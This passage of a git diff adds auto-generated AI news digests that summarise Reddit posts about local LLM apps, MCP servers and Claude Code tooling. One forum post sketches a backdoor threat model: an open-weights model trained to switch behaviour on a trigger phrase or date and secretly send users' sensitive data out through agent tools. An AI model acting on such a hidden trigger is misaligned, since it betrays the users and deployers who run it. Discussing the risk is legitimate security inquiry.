app and just shipped it. windows only. called SEELS. dropping it here cause if anyones gonna find the cracks its you guys. the thing i actually wanted to make wasnt another ollama wrapper. what bugged me is every local model id run would say something dumb and id sit there going "no thats not what i meant". then id close the chat and the model never knew, never learned. so the whole hook of SEELS is theres a Teach button on every reply where you write what it should have said. those corrections pile up into a jsonl corpus, and when you have enough you click Train and it actually kicks off a PEFT LoRA run on your base. no notebook, no python, no terminal. just chat, correct, train. over time the adapters stack up and it becomes your model not theirs. trained a tiny 0.6B helper from scratch on like 110 hand written examples so theres something that runs on CPU out of the box. not replacing your daily 35B obviously but it answers questions about how to use SEELS itself which was the point. rest of standard (free, forever, not a trial): bring any GGUF, voice mode with whisper STT and piper TTS both local no API keys, hardware dashboard so you can stop guessi… + +--- + +## [Could Open Models be trained to secretly go rogue?](https://reddit.com/r/LocalLLaMA/comments/1tmpqrv/could_open_models_be_trained_to_secretly_go_rogue/) +*Reddit r/LocalLLaMA* | 24/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> I was discussing with some other folks how safe is to use open weights models from China and the topic of "trojan horse" came up. We know that, at least with current architecture, models can't run code on their own. They are entirely dependent on tools and harnesses. We also know that a local run model can't have any kind of remote "switch" that would change its behavior or inject a different prompt. But would there be any other ways to "execute order 66" 😄 ? Could a lab, for instance, train a model that would change its behavior upon reading certain trigger phrases or perhaps at a specific date? They would then secretly gather sensitive info and send it somewhere else without user consent. Obviously the model would have to be running in an harness capable of such tool-use (which is quite common with openclaws, hermes, etc). Thoughts? + +--- + +## [I made a Chrome extension that lets me use ChatGPT from any webpage without an API key, so its compeletly free.](https://reddit.com/r/ChatGPT/comments/1tmznuc/i_made_a_chrome_extension_that_lets_me_use/) +*Reddit r/ChatGPT* | 25/05/2026 | Score: 0.94 +Tags: api_update, developer_tool + +> I’ve been building a Chrome extension called **Dichrome**. The basic idea is simple: it lets you use ChatGPT from a sidebar while you’re on any webpage, without needing an API key or paying for a separate AI sidebar subscription. For example, in the screenshots I was on my GitHub repo page. I clicked the screenshot button in the Dichrome sidebar, typed “Can you see the attached image?”, and hit send. Dichrome then sent the prompt and screenshot to ChatGPT through the normal ChatGPT UI. I didn’t have to open ChatGPT myself, switch tabs, upload the image manually, or copy anything over. The response came back inside the sidebar, and the actual ChatGPT conversation was also saved inside my **Dichrome project folder**. That part matters to me because I don’t want random sidebar chats cluttering my normal ChatGPT history. Anything started from the extension gets routed into its own project folder instead. The workflow is basically: 1. Stay on whatever webpage you’re using 2. Click screenshot or send selected text 3. Type your prompt in the sidebar 4. Dichrome sends it to ChatGPT through the normal UI 5. The answer shows up back in the sidebar 6. The chat gets saved in the Dichrome proj… + +--- + diff --git a/data/digest-2026-05-26.md b/data/digest-2026-05-26.md new file mode 100644 index 0000000..4983559 --- /dev/null +++ b/data/digest-2026-05-26.md @@ -0,0 +1,121 @@ +# Stack Scout - AI News Digest +**2026-05-26** | 15 stories | Auto-generated from 541 archived stories + +--- + +## [open-source plug-in for claude code: declare what it can't do in yaml, enforced at the tool boundary](https://reddit.com/r/ClaudeAI/comments/1tofpzr/opensource_plugin_for_claude_code_declare_what_it/) +*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 +Tags: api_update, mcp, open_source, developer_tool + +> last week claude code force-pushed on me. nothing in the prompt said it could, it just inferred "make sure the branch is clean" loosely. wanted a hard rule i could plug in so this couldn't happen again. so i built sponsio, an open-source plug-in for claude code that gates tool calls at the boundary. apache 2.0. hooks in via the claude agent sdk (or the mcp layer if your tools go through there). write contracts in yaml using assume-guarantee structure ("if the agent calls X, the trace must satisfy Y"). when claude code tries to call a tool, sponsio checks first. allow, block, or escalate to human. guarantee clauses are temporal logic over the action trace, so you can also express "tests must pass before commit", "no two writes to the same file in a session", or "max N file edits per session", not just deny-lists. why deterministic: prompts give statistical behavior, not guarantees. once context fills, even obvious rules drift. hard guarantees have to live outside the probabilistic part of the system. how claude code helped build it: i sketched the LTL evaluator AST, claude filled in each operator's trace-evaluation case. framework adapters are mostly claude generations from interfa… + +--- + +## [Built an MCP server so Claude can generate music, images, and video natively. One config block.](https://reddit.com/r/ClaudeAI/comments/1toh1pr/built_an_mcp_server_so_claude_can_generate_music/) +*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 +Tags: api_update, mcp, cli_tool + +> I've been using Claude Code daily for the last few months and kept hitting the same wall: I'd ask Claude to produce a creative artifact (a song, a cover, a short video) and end up writing the API glue myself, then pasting results back into the chat. Felt backwards. So I built an MCP server around my AI generation platform. It exposes three tools to Claude: \- aw\_generate\_music (Suno, full songs with lyrics or instrumental) \- aw\_generate\_image (Z-Image Turbo, Wan 2.5 Spicy, Grok Imagine Quality, GPT-Image-2, Nano Banana 2, and others) \- aw\_generate\_video (Kling 3.0 Standard/Pro/4K T2V + I2V, Wan 2.2, Hailuo 02, Seedance, Grok video) One key. One credit pool. The agent picks the right model for the prompt. Install: npm install -g u/aetherwave-studio/mcp Claude Code config (\~/.config/claude/mcp.json or wherever yours lives): { "mcpServers": { "aetherwave": { "command": "npx", "args": \["-y", "@aetherwave-studio/mcp"\], "env": { "AW\_API\_KEY": "aw\_live\_YOUR\_KEY\_HERE" } } } } Restart Claude. Done. Prompts that work end-to-end without any additional setup: 1. "Generate a 60-second lo-fi track for a study playlist, then make me 3 album cover options in a retro Japanese prin… + +--- + +## [Small set of local MCP server installers for home Linux users](https://reddit.com/r/LocalLLaMA/comments/1to8y2i/small_set_of_local_mcp_server_installers_for_home/) +*Reddit r/LocalLLaMA* | 26/05/2026 | Score: 1.00 +Tags: api_update, mcp, open_source + +> Hi all, I have published a small open-source MCP server bundle called **MCP Basic Servers**: [https://github.com/mchowy-troll/mcp-basic-servers](https://github.com/mchowy-troll/mcp-basic-servers) It is a collection of simple Bash installer scripts for running local **MCP HTTP servers on Linux**. **The idea is simple: run one script, answer a few questions, get a working local MCP endpoint at \`/mcp\`.** This project is mainly for **beginner and intermediate Linux users** who want to experiment with MCP tools at home without manually setting up Python environments, systemd services, SQLite databases, or local web search from scratch. It is not meant to be an enterprise-grade or hardened production platform. It is intentionally simple, readable, and designed for local/home use. The first release includes six servers: * **web** — live web search and webpage fetching through local SearXNG * **files** — local workspace tools for text, CSV, Markdown and PDF * **memory** — local SQLite-based memory * **contacts** — local SQLite-based contacts * **wiki\_verifier** — Wikidata and Wikipedia context/verification tools * **weather** — weather tools using Open-Meteo Default ports are \`8001-80… + +--- + +## [Harbor v0.4.19 - vllm/sglang/llama.cpp launch codex/claude/pi/opencode](https://reddit.com/r/LocalLLaMA/comments/1to8t53/harbor_v0419_vllmsglangllamacpp_launch/) +*Reddit r/LocalLLaMA* | 26/05/2026 | Score: 1.00 +Tags: product_launch, cli_tool, agent_tool + +> I'm usually not posting about Harbor releases out of the respect for the community here, but I think v0.4.19 might save a lot of people some time. Harbor can now launch your local agentic coding tools with local inference backends. For example, to run pi + vllm: # model downloaded and configured harbor up vllm # Harbor knows that vllm is running and will use it harbor launch pi Additionally, `launch` can proxy requests through built-in optimising LLM gateway which automatically injects and resolves tools, such as web search, so you can add web search to an agent by just appending `--web` to the command and Harbor will pre-wire everything: harbor launch --web --model qwen3.5:4b --backend ik_llamacpp mi -p 'Find recent releases of agentic tools and write a two sentence overview' You can find many more details in the wiki here: [https://github.com/av/harbor/wiki/3.-Harbor-CLI-Reference#harbor-launch-launch-options---service-servicetool-args](https://github.com/av/harbor/wiki/3.-Harbor-CLI-Reference#harbor-launch-launch-options---service-servicetool-args) Thank you! + +--- + +## [This is insane.](https://reddit.com/r/ClaudeAI/comments/1to6zg8/this_is_insane/) +*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 +Tags: api_update, mcp, open_source + +> Just installed an open source tool that wiped most of the tool-definition tokens out of my Claude Code context before any prompt. Same MCP servers. Same tools available. 8 servers, 142 tools across them. Before: the tool definitions ate 38k tokens of context every single turn. Cold start, my context bar was already orange and I hadn't typed anything. After: 4k. The Claude Code session sees three tools (`search_tools`, `invoke_tool`, `auth`) and dispatches everything else under the hood. When I ask for a thing, it ranks the catalog with BM25 in microseconds and surfaces the top 5. The part nobody's talking about: there's no LLM in the ranking loop. No embedding API to pay. No vector DB to host. It's keyword search over a flat projection of tool name + description, deterministic, offline. Apparently this was always going to be enough. It's [Ratel](https://github.com/ratel-ai/ratel). Open source. The install is `ratel mcp import` and it migrates your existing Claude Code MCP config in one command, with backups written automatically. Took me 90 seconds. Why is every "context layer" startup pitching me semantic embeddings and inference-time re-ranking when basic BM25 over tool definiti… + +--- + +## [Find where claude code burns your tokens](https://reddit.com/r/ClaudeAI/comments/1toagk7/find_where_claude_code_burns_your_tokens/) +*Reddit r/ClaudeAI* | 26/05/2026 | Score: 0.86 +Tags: api_update, developer_tool, cli_tool + +> I started using claude code as a harness for a side project a few months ago, and the native OTLP exporter gives you metrics and event logs but not the full execution path you need to actually debug. Also, I needed to keep token usage under control too. So I built a package that installs a Stop hook in ~/.claude/settings.json. Claude Code runs this hook automatically every time a turn ends. The hook reads the new portion of the transcript, reconstructs the turn as opentelemetry spans, and posts them to latitude's OTLP endpoint. Install: npx -y @latitude-data/claude-code-telemetry install Works in CLI, desktop app, and IDE extensions. Disclosure: I work at Latitude. I did this for personal needs but now it’s integrated on the product. It's free, MIT-licensed, source is on GitHub. Happy to answer technical doubts + +--- + +## [Anyone else dread keeping web, Android, and iOS releases in sync?](https://reddit.com/r/ClaudeAI/comments/1tnr1vf/anyone_else_dread_keeping_web_android_and_ios/) +*Reddit r/ClaudeAI* | 26/05/2026 | Score: 0.86 +Tags: product_launch, cli_tool, tool_update + +> I got tired of every “small update” turning into version bumps, patch notes, store metadata, web deploys, Android uploads, TestFlight builds, and one more iOS step I couldn’t even run locally because I don’t own a Mac. I have a game built with React + Vite + Matter.js + Capacitor. It’s live on web, Android, and iOS. I was getting worn down by the release chores: version bumps, build numbers, localized patch notes, store metadata, Capacitor syncs, signing, uploads, all the little steps that are easy to mess up and also ridiculously time consuming. Also, I don’t own a Mac, so I thought iOS was out of the question... until.... I wired the repo so Claude can take a normal request like: “ship the updates since our last version bump, browser, Android, and iOS TestFlight with release notes” then the Claude code gets to work with a repeatable path: \- bump the right versions/build numbers both in build and in game ui \- create patch notes for every supported language \- run lint/typecheck/build through \`npm run verify\` \- sync Capacitor after the web build \- build and upload iOS to TestFlight from GitHub Actions on a macOS runner \- build an Android AAB and upload it to Google Play \-… + +--- + +## [Claude makes documents into apps](https://reddit.com/r/ClaudeAI/comments/1toajqg/claude_makes_documents_into_apps/) +*Reddit r/ClaudeAI* | 26/05/2026 | Score: 0.70 +Tags: open_source, tool_update, agent_tool + +> # Any document can become an app I’ve been working on an open-source document format and viewer called **Adaptive Markdown**. The basic idea is simple: A document should not have to stay static. It should be something a coding agent can extend, reshape, and turn into an interactive workspace. This is not just a canvas you edit with a chatbot. The bigger idea is that the document becomes both: 1. the source of truth 2. the programmable interface In other words, the document becomes a living app. You write notes, collect data, draft text, or import files. Then a coding agent can directly modify the document surface: add charts, create calculators, build filters, restyle sections, generate summaries, export views, or turn rough notes into an interactive tool. So instead of having: * a document * a spreadsheet * a dashboard * an app * a changelog * a separate AI chat about all of it You can have one living `.md` file that contains those layers together. # Example A fitness log might start as a plain Markdown journal. Then the agent adds charts. Then it pulls in device data. Then it adds weekly summaries, rolling averages, goal tracking, export options, and a dashboard view. The docume… + +--- + +## [Merge API launches Merge Gateway to help enterprises build custom model routers based on product-specific benchmarksIt prevents enterprise cost overruns from overusing frontier models](https://www.digg.com/ai/5nn022fp?rank=3) +*Digg AI* | Score: 1.00 +Tags: api_update, product_launch + +--- + +## [Merge API launches Merge Gateway to help enterprises build custom model routers based on product-specific benchmarks](https://www.digg.com/ai/5nn022fp) +*Digg AI* | Score: 1.00 +Tags: api_update, product_launch + +--- + +## [i benchmarked Anthropic's tool-search-tool head to head against our own MCP gateway on Opus 4.7. ours held up noticeably better](https://reddit.com/r/ClaudeAI/comments/1to7byy/i_benchmarked_anthropics_toolsearchtool_head_to/) +*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> i'd been running Claude Code with a long list of MCP servers connected. Linear, Notion, GitHub, Slack, a few internal ones. and i was pretty confident that Opus 4.7 plus Claude Code's built in tool-search-tool would just absorb all of it. it mostly did. but i was still hitting \~20% context saturation way too often, before doing any actual work. tried Ratel (our own MCP gateway, we built it for exactly this problem) kind of out of curiosity. then we benchmarked it properly, head to head against Anthropic's own tool-search-tool, same model (Opus 4.7), realistic tool catalogs at 50 / 100 / 180 tools. at the 180 tool pool, measured against the full-catalog baseline: * Ratel: near parity on accuracy (about -1.7pp) and roughly -81% input tokens. * Anthropic's tool-search-tool: about -8.4pp accuracy. so somewhere around 5x the accuracy hit, same model, same catalog. the takeaway for me: a big context window and a built in tool search are not the same thing as a gateway thats actually optimised for the one job of deciding what enters context. repo plus the full benchmark, numbers and methodology, is here: [github.com/ratel-ai/ratel](http://github.com/ratel-ai/ratel) happy to be wrong on… + +--- + +## [I didn't want blind multi-agent orchestration or API rates, so I built atrium to keep me in the loop with my CLI agents.](https://reddit.com/r/ClaudeAI/comments/1to69z3/i_didnt_want_blind_multiagent_orchestration_or/) +*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 +Tags: api_update, cli_tool + +> I'd been running multi-agent workflows for a while. Whether it was across multiple projects or on the same project. Brainstorming sessions, planning sessions, builds happening in worktrees, asking for Claude's opinion on new tires for my car cause it was closer to hand than Google. This felt really clunky in most of the tools I was using and when I started looking for alternatives, everything felt like it was trying to remove me from the equation and just run agents in the background. So, I built atrium. A macOS human-in-the-loop multi-agent workspace. The entire project was built with [the BMad Method](https://github.com/bmad-code-org/BMAD-METHOD?tab=readme-ov-file) and Claude Code (mostly Opus). It's over 60 BMad written epics in now and counting. atrium makes CLI agents first-class citizens within a versatile, tiling workspace. It wires up agents via hooks to the app to surface interactive activity cards, saves state comprehensively so everything resumes, provides a robust CLI that allows agents to completely drive the app, and gives me every tool I need to get the job done. Happy to answer any questions about it and would love to hear how y'all are handling multi-agent workflo… + +--- + +## [Just passed the new Claude Certified Architect - Foundations (CCA-F) exam with a 985/1000!](https://reddit.com/r/ClaudeAI/comments/1to0xfc/just_passed_the_new_claude_certified_architect/) +*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 +Tags: api_update, tool_update + +> The original post was removed by Reddit Filters, so I made new one with same content. I just got my results back today and managed to snag the Early Adopter badge as well. Following up on my recent DP-600 certification, I really wanted to validate my architecture skills specifically on the Anthropic side. The exam covers a lot of practical ground on prompt engineering for tool use, managing context windows efficiently, and handling Human-in-the-Loop workflows. Link to join: https://anthropic.skilljar.com/claude-certified-architect-foundations-access-request Training courses: https://anthropic.skilljar.com/ Cookbook: https://github.com/anthropics/anthropic-cookbook I've created my own Playbook and Mock Exam after the exam: https://drive.google.com/file/d/1luC0rnrET4tDYtS7xe5jUxMDZA-4qNf-/view?usp=sharing https://claude-certified-architect-mock-exam-cyberskill.vercel.app If anyone is preparing for this right now and has questions about the format or the types of architectural patterns tested, ask away! Happy to share some insights on what to study. Updated 26th May 2026: I noticed some mates treated me bananas (https://buymeacoffee.com/zintaen), didn't expect that, but you made my d… + +--- + +## [Finally tested an AI video tool that works directly in Claude without setup](https://reddit.com/r/ClaudeAI/comments/1tnx7ka/finally_tested_an_ai_video_tool_that_works/) +*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> Been using Claude for everything creative lately and got tired of switching to Runway every time I needed video. Found out Higgsfield supports MCP, connected it once, and now Claude generates video directly in chat. Setup is pretty simple. Settings → Connectors → Add custom → paste the MCP URL → sign into Higgsfield once. No API keys or extra setup. Once connected, I describe what I want and Claude handles model selection and rendering. The model variety surprised me. The connector gives access to 20+ video models through one chat: Sora 2, Veo 3.1, Kling 3.0, Seedance 2.0, MiniMax Hailuo, plus Higgsfield's own Soul Cinema and Cinema Studio. Claude picks one based on the prompt or I can choose manually. Real example from yesterday. Asked Claude for a cinematic shot of a soldier reading a letter. Claude picked Cinema Studio, set up cinematic mode, rendered it, and dropped the clip in chat. Maybe around 90 seconds total. Couple caveats: uses Higgsfield credits separately from your Claude sub, max 15 seconds per clip, starter credits for new accounts. The bigger win is workflow continuity. Production stays inside the same conversation where I'm researching and writing. Anyone else usi… + +--- + +## [Scoble: FDOT Launches 120 AI Companies At A Sold-Out San Francisco Event](https://x.com/Scobleizer/status/2057868124112982526) +*Aligned News (Scoble)* | 26/05/2026 | Score: 1.00 +Tags: product_launch, tool_update + +> Robert posted that FDOT launched 120 AI companies at a sold-out San Francisco event. + +--- + diff --git a/data/digest-2026-05-27.md b/data/digest-2026-05-27.md new file mode 100644 index 0000000..b43798b --- /dev/null +++ b/data/digest-2026-05-27.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-05-27** | 15 stories | Auto-generated from 680 archived stories + +--- + +## [MarkdownAI v2.0, its a workflow engine, not a template parser](https://reddit.com/r/ClaudeAI/comments/1tpjmh3/markdownai_v20_its_a_workflow_engine_not_a/) +*Reddit r/ClaudeAI* | 27/05/2026 | Score: 1.00 +Tags: api_update, mcp, tool_update + +> MarkdownAI is a workflow and runbook engine for AI. Yes, it’s also a templating language, but that’s the least interesting thing about it. The power is the MCP server. Claude never sees a stale file again. Every document resolves live, every time. Simple example: your frontmatter. Status fields, version numbers, last-updated dates, owner, the stuff that’s wrong within a week of writing it. With MarkdownAI, frontmatter becomes live. Claude doesn’t read “status: in-progress” from three weeks ago. It reads the actual current state, fetched at render time. No staleness. No verification step. No “is this still true?” check that costs a tool call. That same idea scales to everything in the document, DB record counts, branch names, env values, test results, file trees. Anything that goes stale becomes live. **The grunt work problem** Before Claude does anything useful, it does housekeeping. Verify the branch. Check CI. Query the DB. Hit the health endpoint. Read env vars. Confirm the image exists. Check migrations. That’s a real pre-deployment runbook, and Claude is doing all of it, one tool call at a time. Each check is roughly 2 seconds of dead time plus a context interruption where Cl… + +--- + +## [I ran 8 open-weight models as agents in a persistent MMO for 10 days. Here's the 93k event dataset and some things that I learned](https://reddit.com/r/LocalLLaMA/comments/1tp6pg7/i_ran_8_openweight_models_as_agents_in_a/) +*Reddit r/LocalLLaMA* | 27/05/2026 | Score: 1.00 +Tags: api_update, open_source, developer_tool + +> Howdy everyone! Quick disclosure: I work on this - it's a project my studio created called the Null Epoch. I wasn't really happy with testing my agents with the usual static benchmarks and I wanted to learn more about how models and agents handle long-horizon planning, resource contention, and adversarial pressure over days or weeks in a more dynamic situation. I also have a particular fondness for the MUDs and text based RPGs I grew up on (really dating myself here), so the whole MMO and the open source SDK/TUI are kind of modeled after that experience. It functions as a persistent stress test (in MMORPG form!) where every "player" is an LLM agent. The first 10-day run (Season 0) used 25 agents across 8 open-weight models (Qwen3 235B & 32B, Nemotron 3 Nano 30B, Ministral 14B & 8B, Gemma 3 12B, GLM 4.7 Flash, etc.). I've published the dataset to HuggingFace (CC-BY-4.0). It's around 93,000 logged events and agent actions, and ~70% of the actions include the model's reasoning/justification for the action it took. I'm hoping to include the actual `<think>` reasoning traces in future datasets. **Link:** [FirespawnStudios/null-epoch-season-0-open](https://huggingface.co/d… + +--- + +## [Found a Rust TUI coding agent that aggressively trims context with AST-level chunking. Cut my token bleed sharply with DeepSeek V4 Flash.](https://reddit.com/r/LocalLLaMA/comments/1tp0a5e/found_a_rust_tui_coding_agent_that_aggressively/) +*Reddit r/LocalLLaMA* | 27/05/2026 | Score: 1.00 +Tags: api_update, open_source, agent_tool + +> been hunting for a coding agent that doesn't dump my entire directory tree into every prompt. found vtcode on github — open-source rust tui, surprisingly aggressive on context management. what makes it different from the usual agent frameworks: most shovel the whole codebase context into prompts and burn tokens fast. vtcode goes the opposite way — explicit token budget tracking plus ast-level context extraction via ripgrep + ast-grep. only the structurally relevant code chunks get sent to the model. on my refactor tasks the prompt size dropped sharply. sandboxing isn't an afterthought either. macos seatbelt + linux landlock + seccomp + tree-sitter-bash validation on every model-generated command. the agent stays in your workspace, doesn't roam. paired it with deepseek v4 flash since the public endpoint throttles during peak dev hours. better latency through a third-party endpoint. vtcode natively supports openai-compatible custom providers so plugging in is a single config block: [ agent ] provider = "atlas" default_model = "deepseek-ai/deepseek-v4-flash" [[ custom_providers ]] name = "atlas" base_url = "https://api.atlascloud.ai/v1" api_key_env = "ATLAS_API_KEY" model = "deepseek… + +--- + +## [I built a tool that lets your AI assistant test your entire app in a real browser](https://reddit.com/r/ClaudeAI/comments/1tostnb/i_built_a_tool_that_lets_your_ai_assistant_test/) +*Reddit r/ClaudeAI* | 27/05/2026 | Score: 0.94 +Tags: mcp, open_source, developer_tool + +> So i've been working on this thing called Vibe Testing for a while now and finally putting it out there. Basically it's an MCP server that plugs into Claude Code, Cursor, Windsurf etc. you tell your AI assistant "test the login flow" and it actually does it, reads your source code to understand real selectors and routes, opens a real Playwright browser, clicks through stuff, takes screenshots, and tells you what broke. No test files to write or maintain. it figures out your framework, your routes, your forms from the codebase itself. it even remembers what worked and what was flaky between runs so it gets better over time. 12 tools total, scanning your codebase, exploring pages, executing test scenarios, generating reports, the whole thing. Setup is one command: npx vibe-testing@latest init it auto-detects your editors and configures everything. it's fully open source, would love feedback or contributions: [https://github.com/AishwaryShrivastav/vibe-testing](https://github.com/AishwaryShrivastav/vibe-testing) [https://www.npmjs.com/package/vibe-testing](https://www.npmjs.com/package/vibe-testing) + +--- + +## [Anthropic just confirmed why 90% of non-coding AI agents fail in production](https://reddit.com/r/ClaudeAI/comments/1tph5u4/anthropic_just_confirmed_why_90_of_noncoding_ai/) +*Reddit r/ClaudeAI* | 27/05/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> Anthropic recently published an incredibly deep breakdown analyzing millions of real human-agent tool calls across their public API, and they shared a breakdown of where these agents are being deployed. They said “Software engineering makes up roughly 50% of all agentic activity on their platform”. Everything else: sales, marketing, finance, legal is sitting down in the single digits. A lot of the initial commentary around this has been along the lines of: *"Oh, look, AI agents only work for coding. They haven't cracked the rest of the enterprise yet."* But if you’ve tried to build and deploy an autonomous agent in a non-coding environment, you know that is the wrong conclusion. The models are more than capable but the real problem is that software engineering data is clean, while real-world business data is a horrific and unorganized. Think about it: * Why Coding is Easy for Agents: Code lives in structured Git repo. It follows strict syntax rules, has clear docs and runs inside deterministic terminals. If an agent breaks something, the compiler throws a clean error message telling it exactly what went wrong. * Why the Rest of the World is Hard: A sales or marketing agent doesn’t… + +--- + +## [[R] What 1000+ Harness Experiments Taught Me About Self-Improving Agents [R]](https://reddit.com/r/MachineLearning/comments/1tpbp7m/r_what_1000_harness_experiments_taught_me_about/) +*Reddit r/MachineLearning* | 27/05/2026 | Score: 1.00 +Tags: cli_tool, agent_tool + +> I recently wanted to see whether an AI agent could self-improve a harness to solve terminal bench tasks. It’s possible for an AI agent to propose a meaningful one-time change to the harness, but after experimenting with this for a couple of weeks, I think the continuous self-improvement is mostly an experiment-systems problem. The system needs a way to decide what kind of improvements can safely compound. Turns out there's a lot of parallels to coding-agent customization (e.g. SKILLS.md etc..) too. I wrote my experience of building such system here, including the successful and failure attempts during the process, and how I approached the self-improvement loop. It's not intended as a benchmark claim but more of a systems/research writeup. [https://www.henrypan.com/blog/2026-05-25-self-improvement-harness/](https://www.henrypan.com/blog/2026-05-25-self-improvement-harness/) + +--- + +## [Nvidia H100(94GB VRAM) - should I run llama.cpp or vllm for 30 users inference?](https://reddit.com/r/LocalLLaMA/comments/1tp7znr/nvidia_h10094gb_vram_should_i_run_llamacpp_or/) +*Reddit r/LocalLLaMA* | 27/05/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> I was given the great opportunity to borrow a H100 with 94GB VRAM at work until it is needed by a customer. (No idea how much system ram I will get, but I guess they are a bit flexible on this). \- I want to build a inference endpoint that can handle up to 30 users. \- I want a fairly reasonable big context, say 131,072-262,144. \- I think in most situations, realistically speaking, not more than 10-15 users will use it concurrently. \- Main use for this will be tools like Pi and OpenCode. Was thinking to use Qwen3.6-27B unless anyone can recommend a better one for agentic coding given the constrains. \- Should I use vllm or llama.cpp? Will llama.cpp able to handle the concurrency? \- If running on llama.cpp I would probably use UD-Q6\_K\_XL or UD-Q8\_K\_XL quant from Unsloth. \- If running on vllm I have no idea on what quant to use? Some advice here would be great. \- Is there any good tool to benchmark "concurrent users"? + +--- + +## [litellm vs any-llm (otari)](https://reddit.com/r/LocalLLaMA/comments/1tp6p5j/litellm_vs_anyllm_otari/) +*Reddit r/LocalLLaMA* | 27/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> I am considering switching from litellm (sdk) to Mozilla’s [any-llm.](https://github.com/mozilla-ai/any-llm) They also have a proxy to go with it called [otari.](https://github.com/mozilla-ai/otari) On the face of it the repos looks a lot more well kept and stable (had a lot of issues with litellm before). Was wondering if others have already done similar and have positive or negative experiences + +--- + +## [Beating the $100 SDK Credit Cap: Parallel Orchestration and Extended Timeouts in Agent Fleets](https://reddit.com/r/ClaudeAI/comments/1tp1476/beating_the_100_sdk_credit_cap_parallel/) +*Reddit r/ClaudeAI* | 27/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Anthropic’s impending shift to meter programmatic Agent SDK and `claude -p` usage under a rigid monthly credit allowance means developers have to start engineering for extreme token frugality and runtime efficiency. If your workflow engine blocks your entire system every time an agent runs a long file modification, your operational costs and development velocity take a massive hit. Flotilla v0.5.0 completely overhauls its background execution engine to maximize Claude's heavy-lifting potential while shielding your wallet from continuous credit drains: * **Non-Blocking Parallel Loops (v5)**: As mapped out in the blueprint, we swapped out sequential, blocking subprocess calls for an asynchronous process group manager tracking active workflows concurrently via non-blocking `Popen` execution. * **The 30-Minute Claude Safe-Window**: Complex multi-file engineering steps or Claude Code sessions frequently get choked out by standard tool limits. We replaced uniform global process constraints with an explicit per-agent map, extending Claude's runtime allowance to 1800s (30 minutes) to entirely eliminate `SIGTERM` / exit 143 mid-task terminations. * **Smart Local Delegation**: To keep you c… + +--- + +## [Claude Code has zero idea what your codebase looks like structurally (Open source with benchmarks)](https://reddit.com/r/ClaudeAI/comments/1tpbjwo/claude_code_has_zero_idea_what_your_codebase/) +*Reddit r/ClaudeAI* | 27/05/2026 | Score: 0.78 +Tags: mcp, open_source + +> Every time I watch someone use Claude Code on a real codebase, the same thing happens. It rewrites a module that three other modules depend on without any awareness of coupling. It just reads the file, makes changes, moves on It reads files one at a time without any map. Doesn't know which files are coupled. Doesn't know who owns what. Doesn't know why that weird pattern in the auth module exists on purpose. I've been building an open source MCP layer to fix this called repowise. Self-hosted, pip install, AGPL-3.0. Five context layers that sit between your codebase and the model: Graph - AST-based dependency graph. Knows what depends on what before it touches anything. Git - Hotspots, ownership, co-change patterns, bus factor. "This file always changes with these three other files. Docs - Auto-generated wiki from your code. Searchable. Decisions - Captures architectural intent. Why the code is shaped the way it is. Stops the model from "fixing" things that were intentional. Code Health - 12 biomarkers per file. Complexity, duplication, untested hotspots, declining trends. Zero LLM, pure static analysis. We ran a time-travel experiment on Django (542 files): scored every file, then… + +--- + +## [Millions of AI agents imperiled by critical vulnerability in open source package](https://arstechnica.com/information-technology/2026/05/millions-of-ai-agents-imperiled-by-critical-vulnerability-in-open-source-package/) +*Ars Technica AI* | Score: 0.74 +Tags: open_source, developer_tool + +--- + +## [CrankGPT by Squeez Labs - hand-cranked edge AI - talk about local AI!!!](https://reddit.com/r/LocalLLaMA/comments/1tpm7m3/crankgpt_by_squeez_labs_handcranked_edge_ai_talk/) +*Reddit r/LocalLLaMA* | 28/05/2026 | Score: 1.00 +Tags: tool_update + +> I met Katrin from Squeez Labs at an event hosted by Pathway AI (the team behind Baby Dragon Hatchling) where she told me about CrankGPT, a literally hand-cranked device for running local LLMs. It's apparently real. It's appearently launched. It's apparently glorious. Check it out at [https://crankgpt.com/](https://crankgpt.com/) \- if anyone from Squeez Labs posts here and I'm stealing their thunder, I'll take the post down! But I've been really excited about this. So local you gotta squeez it with yer own armz. ;) [https://www.youtube.com/watch?v=HSapdLYpmWY](https://www.youtube.com/watch?v=HSapdLYpmWY) + +--- + +## [BEAM 100K memory benchmark: CSM vs Hindsight local artifact comparison [R]](https://reddit.com/r/MachineLearning/comments/1tpjx2m/beam_100k_memory_benchmark_csm_vs_hindsight_local/) +*Reddit r/MachineLearning* | 27/05/2026 | Score: 1.00 +Tags: open_source + +> \[R\] BEAM 100K memory benchmark: CSM vs Hindsight local artifact comparison I’m looking for feedback on a local agent-memory benchmark comparison, especially from people who care about evaluation methodology. I built an open-source R&D memory system called Context Swarm Memory (CSM). It uses bounded read-only memory shards, query routing, probe/recall/synthesis, cited packets, and explicit Committer-gated writes. The current comparison is against the accepted local Hindsight artifact on BEAM 100K: * CSM: 0.757573 AMB score, 342 / 400 correct * Hindsight: 0.733658 AMB score, 326 / 400 correct * CSM uses 38.2% fewer answer-visible context tokens * CSM is slower: 29.23s average retrieval vs 6.38s I want to be precise about the claim: This is not an official leaderboard claim. It is not a BEAM 10M claim. It is a committed local accepted-artifact comparison at 100K, and the next step should be independent replication or official chart acceptance. Repo: [https://github.com/muhamadjawdatsalemalakoum/context-swarm-memory](https://github.com/muhamadjawdatsalemalakoum/context-swarm-memory) Evidence and reproducibility notes: [https://muhamadjawdatsalemalakoum.github.io/context-swarm-me… + +--- + +## [Running real-time 1080p video generation and editing on your own (Dreamverse OSS release)](https://reddit.com/r/StableDiffusion/comments/1tpfbrl/running_realtime_1080p_video_generation_and/) +*Reddit r/StableDiffusion* | 27/05/2026 | Score: 1.00 +Tags: open_source + +> Hi guys, FastVideo team here again. Following up on our[ Dreamverse post](https://haoailab.com/blogs/dreamverse/), today we finally cleaned our code up and are excited to say that it's open source! Both the backend and frontend are out, so you can self-host the whole thing. B200s 